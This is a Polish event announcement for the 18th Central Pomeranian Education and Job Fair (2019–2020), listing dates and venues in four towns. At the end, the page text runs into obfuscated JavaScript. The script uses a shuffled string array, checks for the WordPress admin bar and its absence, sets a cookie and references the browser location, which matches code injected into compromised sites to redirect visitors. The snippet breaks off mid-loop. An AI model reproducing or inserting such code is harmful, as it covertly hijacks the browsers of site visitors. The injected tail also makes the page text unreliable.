18 Środkowopomorskie Targi Edukacji i Pracy 2019 | Północna Izba Gospodarcza w Koszalinie

Zapraszamy do udziału w największej imprezie targowej na Pomorzu Środkowym tegoroczna edycja 18. Środkowopomorskich Targów Edukacji i Pracy GlobalLogic Job Fair to, aż cztery imprezy targowe, które odbędą się w Kołobrzegu, Szczecinku, Słupsku i Koszalinie.
Serdecznie Zapraszamy !

Oprócz największych firm z regionu wśród wystawców znajdą się szkoły policealne i wyższe. Targi Edukacji i Pracy GlobalLogic to okazja do wytyczenia swojej ścieżki kariery, poznania oferty edukacyjnej i zawodowej regionu oraz nawiązania kontaktów.

Zachęcamy wystawców do rejestracji na stronie Biura Karier Politechniki Koszalińskiej – http://kariera.koszalin.pl/wystawcy

Targi odbędą się:
• 27.11.2019 w Kołobrzegu w godzinach 11-15, w Hali Millenium przy ul. Łopuskiego 36
• 04.12.2019 w Szczecinku w godzinach 11-15, w Kronospan Design Center przy ul. Pilskiej 2
• 11.12.2019 w Słupsku w godzinach 11-15, w Hali Gryfii przy ul. Szczecińskiej 99
• 26.02. 2020 w Koszalinie w godzinach 11-15, w Hali Widowiskowo – Sportowej przy ul. Śniadeckich 4

Organizatorami targów są Politechnika Koszalińska oraz Biuro Targów „Bałtyk”

Więcej informacji: http://kariera.koszalin.pl/targi-pracy bk@kariera.koszalin.pl (94) 34-86-676 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m